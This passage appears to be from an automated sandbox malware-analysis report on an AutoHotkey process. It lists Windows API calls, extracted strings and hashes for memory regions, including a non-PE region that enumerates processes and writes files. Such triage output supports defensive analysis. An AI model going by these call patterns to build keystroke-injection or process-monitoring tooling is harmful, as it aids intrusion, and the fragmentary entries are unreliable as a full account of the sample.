                                        • Part of subcall function 0485BBA9: CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0485BBBA
                                        • Part of subcall function 0485BBC9: Process32First.KERNEL32(?,00000128), ref: 0485BBDA
                                      • CloseHandle.KERNEL32(?,0487437B), ref: 0487436E
                                        • Part of subcall function 0485BBE9: Process32Next.KERNEL32(?,00000128), ref: 0485BBFA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: 0aad118bd18f981ccd2805f6fe58247a85df27860aec1da068bb4c20370f6f04
                                      • Instruction ID: 298f28678f0f1770c56ccad6ffc1469c623700846c607f38bd70ea92f9c43baa
                                      • Opcode Fuzzy Hash: 0aad118bd18f981ccd2805f6fe58247a85df27860aec1da068bb4c20370f6f04
                                      • Instruction Fuzzy Hash: 9A215470A04709AFEB11DF69CC60DDDBBB9EB89B08F4189B5E808D2650E774BA50DD11
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualFree.KERNEL32(?,?,00004000), ref: 048423F9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: 11b8bfe42085adfea4406494577bbd31a3c7dc506881e4582e95ebb417fc903d
                                      • Instruction ID: 724c32e1bff75534dca8bab3a1e10e0be8257da654d6bbdadc6f1b204fafa5c2
                                      • Opcode Fuzzy Hash: 11b8bfe42085adfea4406494577bbd31a3c7dc506881e4582e95ebb417fc903d
                                      • Instruction Fuzzy Hash: C921CEB5608206DFD750CF2CD884A2AB7F0FF99354B104EA8F594DB314E330E9998B52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0487459D: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,04874621,?,?,?,00000001), ref: 048745E2
                                        • Part of subcall function 0487459D: WriteFile.KERNEL32(00000000,?,00000000,048746A2,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,04874621), ref: 048745FA
                                        • Part of subcall function 0487459D: CloseHandle.KERNEL32(00000000,00000000,?,00000000,048746A2,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,04874621), ref: 04874606
                                      • Sleep.KERNEL32(00000002,00000000,048746A2,?,00000001), ref: 04874682
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSleepWrite
                                      • String ID:
                                      • API String ID: 1443029356-0
                                      • Opcode ID: c23387efbe7a08dd00ed3dbaafa546ac01b5c4794a2b51c079ffa1c49a3ba0b4
                                      • Instruction ID: 6e2084d38e87ca8433795a1f3a64cd986e4ad87cb5bae91f82e6b091d590b330
                                      • Opcode Fuzzy Hash: c23387efbe7a08dd00ed3dbaafa546ac01b5c4794a2b51c079ffa1c49a3ba0b4
                                      • Instruction Fuzzy Hash: 85F0A93060460CFFE701EB6CCC51A9DB7F8DB45704F504A719514D3650EBB4BE00DA11
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • Sleep.KERNEL32(00000002,04875BA6,00000000,04875BC1), ref: 0487518E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 4a6a9ff478d8471613e68ed5950632d719ecdef18c16d9231ea721654ab0c535
                                      • Instruction ID: 291952e6025789769b85e625f438fa04808133a7c0bd4156c8f520b9b1e4161b
                                      • Opcode Fuzzy Hash: 4a6a9ff478d8471613e68ed5950632d719ecdef18c16d9231ea721654ab0c535
                                      • Instruction Fuzzy Hash:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.00000000048AA000.00000040.00001000.00020000.00000000.sdmp, Offset: 048AA000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_48aa000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
                                      • Instruction ID: 78e4ba4547e8dff531cb66cb15c26eaf3ec346b51f076802617d439c23f133a4
                                      • Opcode Fuzzy Hash: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
                                      • Instruction Fuzzy Hash: A931E621204645BFEB224AE88C21BE6B758BF12328F510F15EDEAD3781E770B564C7E5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _memmove$__wcsnicmp
                                      • String ID: & $#CommentFlag$%s up::$%s%s%s$%s::$<>=/|^,:$<>=/|^,:.+-*&!?~$?*- $@$@$AltTab$AltTabAndMenu$AltTabMenu$AltTabMenuDismiss$Continuation section too long.$Default$Duplicate hotkey.$Duplicate label.$Functions cannot contain functions.$Get$Hotkeys/hotstrings are not allowed inside functions.$IfWin should be #IfWin.$Invalid single-line hotkey/hotstring.$Join$LTrim$Missing ")"$Missing "{"$Missing "}"$Not a valid method, class or property definition.$Not a valid property getter/setter.$Note: The hotkey %s will not be active because it does not exist in the current keyboard layout.$OnClipboardChange$Out of memory.$RTrim$Return$Set$ShiftAltTab$Static$This hotstring is missing its abbreviation.$This line does not contain a recognized action.$and$if not GetKeyState("%s")${Blind}%s%s{%s DownR}${Blind}{%s Up}${LCtrl up}${RCtrl up}
                                      • API String ID: 1111699894-2406232025
                                      • Opcode ID: b991970de2a430f60c99b32bb1d73b5f463ebb95efc4c14f56d7c003954726a9
                                      • Instruction ID: 1f6b0364eb161c12d2371a5075a467368e5717f92921509a5db4fd246407d96f
                                      • Opcode Fuzzy Hash: b991970de2a430f60c99b32bb1d73b5f463ebb95efc4c14f56d7c003954726a9
                                      • Instruction Fuzzy Hash: 652314717043209ADB309F24A8417BBB7E0AFA5304F94452FE88587392E77D9D85C79B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __wcsnicmp.LIBCMT ref: 004148A9
                                      • __wcsnicmp.LIBCMT ref: 004148D7
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00414975
                                      • AttachThreadInput.USER32(000013F0,00000000,00000001), ref: 004149AD
                                      • GetTickCount.KERNEL32 ref: 004149CD
                                      • GetCurrentThreadId.KERNEL32 ref: 00414A0F
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00414A48
                                      • GetAsyncKeyState.USER32(0000005C), ref: 00414A56
                                      • GetForegroundWindow.USER32 ref: 00414AB5
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00414AC9
                                      • GetGUIThreadInfo.USER32(00000000,?), ref: 00414ADF
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00414AF6
                                      • GetKeyboardLayout.USER32(00000000), ref: 00414AFB
                                      • GetTickCount.KERNEL32 ref: 00414B50
                                      • BlockInput.USER32(00000001), ref: 00414C7F
                                      • GetTickCount.KERNEL32 ref: 00414CB6
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00414CDB
                                      • GetTickCount.KERNEL32 ref: 00414D05
                                      • _wcschr.LIBCMT ref: 00414D23
                                      • _free.LIBCMT ref: 004156E6
                                      • GetTickCount.KERNEL32 ref: 0041571D
                                      • GetAsyncKeyState.USER32(000000A0), ref: 0041578E
                                      • GetAsyncKeyState.USER32(000000A1), ref: 004157A3
                                      • GetAsyncKeyState.USER32(000000A2), ref: 004157B8
                                      • GetAsyncKeyState.USER32(000000A3), ref: 004157CD
                                      • GetAsyncKeyState.USER32(000000A4), ref: 004157E2
                                      • GetAsyncKeyState.USER32(000000A5), ref: 004157F7
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00415809
                                      • GetAsyncKeyState.USER32(0000005C), ref: 0041581B
                                      • GetTickCount.KERNEL32 ref: 00415847
                                      • GetKeyState.USER32(00000014), ref: 004158FD
                                      • GetKeyState.USER32(00000014), ref: 00415905
                                      • GetForegroundWindow.USER32(00000000), ref: 00415939
                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00415940
                                      • AttachThreadInput.USER32(000013F0,?,00000000), ref: 00415977
                                      • BlockInput.USER32(00000000), ref: 0041598A
                                      • GetForegroundWindow.USER32(00000000), ref: 004159C1
                                      • GetWindowThreadProcessId.USER32(00000000), ref: 004159C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: State$Async$Thread$Window$CountTick$Process$Input$Foreground$AttachBlock__wcsnicmp$CurrentInfoKeyboardLayoutMessagePeek_free_wcschr
                                      • String ID: 0$6Dd$@$@$ASC $Click$Down$Raw$Temp$Text$^+!#{}${Blind}${Click${Text}
                                      • API String ID: 2351639582-2613549127
                                      • Opcode ID: b7e2721a82e742bfa610aba42655fd02882d97a0f62c758ca71604329d8778c5
                                      • Instruction ID: c3c0f8d46686c6f958d5c087e36318339bae220bd0f59bf9fa7e04c04916dbcb
                                      • Opcode Fuzzy Hash: b7e2721a82e742bfa610aba42655fd02882d97a0f62c758ca71604329d8778c5
                                      • Instruction Fuzzy Hash: CAB22771904244EBDB10DF64DC41BEE3BB1AF95314F18406BE845AB382D7789D85CBAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __wcsicoll.LIBCMT ref: 0043B167
                                      • __wcsicoll.LIBCMT ref: 0043B179
                                      • __wcsicoll.LIBCMT ref: 0043B18B
                                      • __wcsicoll.LIBCMT ref: 0043B19D
                                      • __wcsicoll.LIBCMT ref: 0043B1AF
                                      • __wcsicoll.LIBCMT ref: 0043B1C1
                                      • _memset.LIBCMT ref: 0043B368
                                      • __swprintf.LIBCMT ref: 0043B3EA
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000044,?), ref: 0043B483
                                      • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,?,00000044,?), ref: 0043B495
                                      • CloseHandle.KERNEL32(?), ref: 0043B4D6
                                      • _memset.LIBCMT ref: 0043B513
                                      • __wcsicoll.LIBCMT ref: 0043B55F
                                      • _wcschr.LIBCMT ref: 0043B5AB
                                      • ShellExecuteExW.SHELL32(0000003C), ref: 0043B6B6
                                      • GetModuleHandleW.KERNEL32(kernel32.dll,GetProcessId), ref: 0043B6DA
                                      • GetProcAddress.KERNEL32(00000000), ref: 0043B6E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$Handle$Close_memset$AddressCreateExecuteModuleProcProcessShell__swprintf_wcschr
                                      • String ID: Verb: <%s>$"%s" %s$%sAction: <%-0.400s%s>%sParams: <%-0.400s%s>$...$.exe.bat.com.cmd.hta$Failed attempt to launch program or document:$GetProcessId$Launch Error (possibly related to RunAs):$String too long.$System verbs unsupported with RunAs.$\/.$edit$explore$find$kernel32.dll$open$print$properties
                                      • API String ID: 3691946165-2616667029
                                      • Opcode ID: 5abcef5d06facff45b6314a4aafd58100ccc0af49607f7105370ac83bfe8da4b
                                      • Instruction ID: 5ca24864ffdfe391d9afc1f4fefd1a1fc3c9b0b0be8a4726113c0e62d7cb2fcb
                                      • Opcode Fuzzy Hash: 5abcef5d06facff45b6314a4aafd58100ccc0af49607f7105370ac83bfe8da4b
                                      • Instruction Fuzzy Hash: 9A22AD71E002099BDF20DF65CC46BAF77A4EF98304F04556BEA05A7381E7789944CBEA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __fassign__wcsicoll$MetricsSystemWindow__wcsnicmp$ClientForegroundIconicRectScreen_wcsncpy_wcsrchrwcstoxl
                                      • String ID: Icon$Trans$dll$exe$ico
                                      • API String ID: 1615180671-2549557054
                                      • Opcode ID: 5cffa2d02b715339d04d368462fea6281d9516d45dcbc2f7cec04f06c29c42de
                                      • Instruction ID: 6781487cd69923d147860fce434f4b023b3ed7f3227315c4d7f94e20bdf9f24e
                                      • Opcode Fuzzy Hash: 5cffa2d02b715339d04d368462fea6281d9516d45dcbc2f7cec04f06c29c42de
                                      • Instruction Fuzzy Hash: 8462DEB1A083419FE724DF258880B6BBBE4AFC5704F14492EF58597381E778D845CBAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: <>=/|^,:*&~!()[]{}"$ <>=/|^,:*&~!()[]{}+-?$ <>=/|^,:*&~!()[]{}+-?.$ =$'\;`$($+$A label must not point to an ELSE or UNTIL or CATCH.$Ambiguous or invalid use of "."$Divide by zero$Missing close-quote$Not allowed as an output variable.$Out of memory.$Parameter #2 invalid.$Parameter #2 required$Parameter #3 invalid.$Parse$Quote marks are required around this key.$SMHD$The leftmost character above is illegal in an expression.$Too many var/func refs.$Unexpected %
                                      • API String ID: 3832890014-3913940891
                                      • Opcode ID: 4e9acc68733d71761e00002537f0154bf6dc513c63535190e0ba9a5c7405b02e
                                      • Instruction ID: f4b49cb2a5af36337f388e1733ae10676f5a2c611ddfa226361d74bc3980114f
                                      • Opcode Fuzzy Hash: 4e9acc68733d71761e00002537f0154bf6dc513c63535190e0ba9a5c7405b02e
                                      • Instruction Fuzzy Hash: 7FA205717043618ADB209F15E8407BBB7E1AF91314F96446FE8858B381E77CDC85C7AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostMessageW.USER32(0002044A,0000041E,00000000,?), ref: 0040C301
                                      • GetForegroundWindow.USER32 ref: 0040C37C
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040C396
                                      • GetGUIThreadInfo.USER32(00000000,?), ref: 0040C3AE
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0040C3C6
                                      • GetKeyboardLayout.USER32(00000000), ref: 0040C3CB
                                      • GetClassNameW.USER32(00000000,?,0000001C), ref: 0040C3F0
                                      • __wcsicoll.LIBCMT ref: 0040C403
                                      • ToUnicodeEx.USER32(?,?,?,?,00000002,00000000,00000000), ref: 0040C499
                                      • ToUnicodeEx.USER32(?,?,?,?,00000002,00000000,00000000), ref: 0040C4BE
                                      • GetKeyState.USER32(00000014), ref: 0040C517
                                      • ToUnicodeEx.USER32(?,?,?,?,00000002,00000000,00000000), ref: 0040C582
                                      • ToUnicodeEx.USER32(?,?,?,?,00000002,00000000,?), ref: 0040C67B
                                      • ToUnicodeEx.USER32(?,?,?,?,00000002,00000000,?), ref: 0040C75F
                                      • ToUnicodeEx.USER32(?,?,?,?,00000002,00000000,?), ref: 0040C794
                                      • _memset.LIBCMT ref: 0040C7C7
                                      • ToUnicodeEx.USER32(?,?,?,?,00000002,00000000,?), ref: 0040C811
                                      Similarity
                                      • API ID: Unicode$ThreadWindow$Process$ClassForegroundInfoKeyboardLayoutMessageNamePostState__wcsicoll_memset
                                      • String ID: 0$ApplicationFrameWindow
                                      • API String ID: 1795949194-1469001145
                                      • Opcode ID: 96dc43f701551e9b8907ddb99e0c0740473af773b2777b2ceee3ceb27f2bce96
                                      • Instruction ID: fc26394d7529ecc9bf4bda175551f6bc0fe6c8818d9b59603b6b3f170d38348c
                                      • Opcode Fuzzy Hash: 96dc43f701551e9b8907ddb99e0c0740473af773b2777b2ceee3ceb27f2bce96
                                      • Instruction Fuzzy Hash: 78F13A31508380DED721CB24D894BBB7BE4EB8A704F04463FE885973D2D7789949D7AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0041CA90: __wcsicoll.LIBCMT ref: 0041CAAB
                                        • Part of subcall function 0041CA90: __wcsicoll.LIBCMT ref: 0041CAC1
                                      • GetForegroundWindow.USER32 ref: 00442859
                                      • IsWindowVisible.USER32(00000000), ref: 00442874
                                      Similarity
                                      • API ID: Window__wcsicoll$ForegroundVisible
                                      • String ID: %s1$0x%06X$0x%08X$GetLayeredWindowAttributes$Parameter #2 invalid.$user32
                                      • API String ID: 1910143062-141734719
                                      • Opcode ID: 453a6aa50027174082cedce99cb7d4f061df8e7c1ec26787be7f105a86ab5a6b
                                      • Instruction ID: 2a0d6012060bb4b7cf7467790ff51c93513cd7879697af52335a722f09b628c9
                                      • Opcode Fuzzy Hash: 453a6aa50027174082cedce99cb7d4f061df8e7c1ec26787be7f105a86ab5a6b
                                      • Instruction Fuzzy Hash: 7ED124727043015BE720EF69AD81F6B73D8AB98314F504A2FF945972C1DAF8DC4483AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindFirstFileW.KERNEL32 ref: 0044D5A4
                                      • GetTickCount.KERNEL32 ref: 0044D5BB
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0044D5DE
                                      • GetTickCount.KERNEL32 ref: 0044D5F4
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044D6B5
                                      • FindClose.KERNEL32(00000000), ref: 0044D6C4
                                      • GetLastError.KERNEL32 ref: 0044D6DB
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0044D725
                                      • GetTickCount.KERNEL32 ref: 0044D73C
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0044D75F
                                      • GetTickCount.KERNEL32 ref: 0044D775
                                      • __swprintf.LIBCMT ref: 0044D7E6
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044D80C
                                      • FindClose.KERNEL32(00000000), ref: 0044D81B
                                      Similarity
                                      • API ID: Find$CountFileTick$CloseFirstMessageNextPeek$ErrorLast__swprintf
                                      • String ID: %s\%s$.
                                      • API String ID: 2043249117-2631528844
                                      • Opcode ID: a5495b4742bf325c753171301b87c755e6be2d3d861bb32ee9abc19556a7e317
                                      • Instruction ID: 60e6e54888df9337c150f74833bcb2375433215fda5bcd6b74ea0acd044e7332
                                      • Opcode Fuzzy Hash: a5495b4742bf325c753171301b87c755e6be2d3d861bb32ee9abc19556a7e317
                                      • Instruction Fuzzy Hash: 6281D9359043059FD720EF24D884BAB77E5EF84314F05492FF89687390EBB8A945C75A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: __wcsicoll$Clipboard$DataFormatName__wcsnicmp
                                      • String ID: Embed Source$Link Source$MSDEVColumnSelect$MSDEVLineSelect$Native$ObjectLink$OwnerLink
                                      • API String ID: 3127108255-1844231336
                                      • Opcode ID: 1369400820dd825248964eb8c27f6f12a8442828932965714ae623aefdcd4fc0
                                      • Instruction ID: 160f863454043d71a15cd635fa272db83c91929eb6ba05ad37da613675058f47
                                      • Opcode Fuzzy Hash: 1369400820dd825248964eb8c27f6f12a8442828932965714ae623aefdcd4fc0
                                      • Instruction Fuzzy Hash: 5011E47290030126DB20F7608D42BAF76D89F20702F54093EAC95D12C2F7BDDA18CAAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetForegroundWindow.USER32(00000001,?,?,00000000), ref: 0045C403
                                      • IsIconic.USER32(00000000), ref: 0045C410
                                      • GetWindowRect.USER32(00000000,?), ref: 0045C424
                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0045C474
                                        • Part of subcall function 00443AD0: GetForegroundWindow.USER32 ref: 00443BC1
                                        • Part of subcall function 00443AD0: IsIconic.USER32(00000000), ref: 00443BD0
                                        • Part of subcall function 00443AD0: GetWindowRect.USER32(?,?), ref: 00443BE8
                                      Similarity
                                      • API ID: Window$ForegroundIconicRect$Create
                                      • String ID: 0x%06X$Alt$DISPLAY$RGB$Slow
                                      • API String ID: 472947238-780868468
                                      • Opcode ID: 814949ed51662adac389453c6611237bf09c4d221aaef5d41941407a7515d679
                                      • Instruction ID: 99112cdcc19f8f63909ba898ffbc545652ef35aab0819a49b9b2df07c7d25289
                                      • Opcode Fuzzy Hash: 814949ed51662adac389453c6611237bf09c4d221aaef5d41941407a7515d679
                                      • Instruction Fuzzy Hash: C141F7317443006BD210AB659C81F7F7798EB86716F10052BFE51962C2DAA99C0987BE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: Clipboard$CloseEmptyGlobalUnlock
                                      • String ID: Can't open clipboard for writing.$GlobalLock$Out of memory.
                                      • API String ID: 219879227-2567692066
                                      • Opcode ID: 8f3b26adc78bcdb9eb79fa024ea01f02febe4a29d5a66cc4ef47170832be32b1
                                      • Instruction ID: c57421b41dc4e990d6799bc134f68bd9a405de37a936a3b3bf9b31c77ae85033
                                      • Opcode Fuzzy Hash: 8f3b26adc78bcdb9eb79fa024ea01f02febe4a29d5a66cc4ef47170832be32b1
                                      • Instruction Fuzzy Hash: 87419E36901214DBDB10BF69AC4D66F7B64EB85F0BB01067FE84692320DB7989448BDD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • EmptyClipboard.USER32 ref: 00405184
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040519B
                                      • CloseClipboard.USER32 ref: 004051A4
                                      • GlobalUnlock.KERNEL32(00000000,00000000,-00000001), ref: 004051DB
                                      • GlobalFree.KERNEL32(00000000), ref: 004051ED
                                      • GlobalUnlock.KERNEL32(?,-00000001), ref: 00405203
                                      • CloseClipboard.USER32 ref: 00405208
                                        • Part of subcall function 00405260: GlobalUnlock.KERNEL32(00000000,74DEE0D0,?,00000000,00405259,SetClipboardData), ref: 0040527C
                                        • Part of subcall function 00405260: CloseClipboard.USER32 ref: 00405281
                                        • Part of subcall function 00405260: GlobalUnlock.KERNEL32(00000000,74DEE0D0,?,00000000,00405259,SetClipboardData), ref: 00405295
                                        • Part of subcall function 00405260: GlobalFree.KERNEL32(00000000), ref: 004052A5
                                      Similarity
                                      • API ID: Global$Unlock$Clipboard$Close$Free$Empty
                                      • String ID: Can't open clipboard for writing.$EmptyClipboard$SetClipboardData
                                      • API String ID: 1414016178-2690908087
                                      • Opcode ID: c73e0caa30bde1bd22e9df05c7a86d4b6c09dbf97a423425490f2711cdd72d5a
                                      • Instruction ID: 8d1d48b6001d82658aec73d50d9fc647b4864f78e018f0f0a72cb5d81f1ac77b
                                      • Opcode Fuzzy Hash: c73e0caa30bde1bd22e9df05c7a86d4b6c09dbf97a423425490f2711cdd72d5a
                                      • Instruction Fuzzy Hash: 50316C71A01B019FDB30AFA6D8C4517BBE4EF51305324893FE18796AA1CB38E884CF58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 0041647E
                                      • GetKeyboardState.USER32(?), ref: 0041654A
                                      • SetKeyboardState.USER32(?), ref: 004165E9
                                      • PostMessageW.USER32(00000000,00000100,?,00000000), ref: 00416615
                                      • PostMessageW.USER32(00000000,00000101,?,00000000), ref: 00416652
                                      • BlockInput.USER32(00000000), ref: 0041668E
                                      • GetForegroundWindow.USER32 ref: 004166EC
                                      • GetAsyncKeyState.USER32 ref: 0041671C
                                      • keybd_event.USER32(?,00000000,?,00000000), ref: 004167E7
                                      • GetAsyncKeyState.USER32(?), ref: 00416832
                                      • keybd_event.USER32(?,00000000,00000002,00000000), ref: 00416912
                                      • GetAsyncKeyState.USER32(?), ref: 0041694D
                                      • BlockInput.USER32(00000001), ref: 004169AE
                                      Similarity
                                      • API ID: State$Async$BlockInputKeyboardMessagePostkeybd_event$CurrentForegroundThreadWindow
                                      • String ID:
                                      • API String ID: 802988723-0
                                      • Opcode ID: 7bdbf257f0675f6cb940170d5053c9fd39849ff9e705013827cf156930de4698
                                      • Instruction ID: 373af51758b1cfb73e14f7e3d7445ebf64b6756c6e97ed69fdd2b3924b22597b
                                      • Opcode Fuzzy Hash: 7bdbf257f0675f6cb940170d5053c9fd39849ff9e705013827cf156930de4698
                                      • Instruction Fuzzy Hash: 8702F3B05093859BDB11DF24D8447EB7FE5AB46318F09445FF88587391C63CC989CBAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0048417A
                                      Similarity
                                      • API ID: ProcessThreadWindow
                                      • String ID:
                                      • API String ID: 1653199695-0
                                      • Opcode ID: c3d927dbe5d44382d6bc045fb318de5d0e8f67fbfa7f5f6e6d5b53711f78de40
                                      • Instruction ID: b239e7d7b5332848d61dbbbdbe924dfe08be1d45e7ca1f5319af6318759aa408
                                      • Opcode Fuzzy Hash: c3d927dbe5d44382d6bc045fb318de5d0e8f67fbfa7f5f6e6d5b53711f78de40
                                      • Instruction Fuzzy Hash: 22517C717083022BE320BF686C49B6F7BD8DBC1708F440C6AF90192682E7B8D844879E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: Duplicate class definition.$Full class name is too long.$Invalid class name.$Missing class name.$Out of memory.$Syntax error in class definition.$This class definition is nested too deep.$__Class$extends
                                      • API String ID: 1038674560-3763243221
                                      • Opcode ID: 066de17c46d6b9157782770263903c6dc14135bf3431ddf4fcb7b9dfd7b1a775
                                      • Instruction ID: c21f3f0e24b054165d4d547b89fe1bf609704dfc47b75449ab7d33523ab9c9bf
                                      • Opcode Fuzzy Hash: 066de17c46d6b9157782770263903c6dc14135bf3431ddf4fcb7b9dfd7b1a775
                                      • Instruction Fuzzy Hash: 6DE1EF717002209FC714DF19E884AABB7E0EB98314F94846FEC498B351D778DDA5CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Similarity
                                      • API ID:
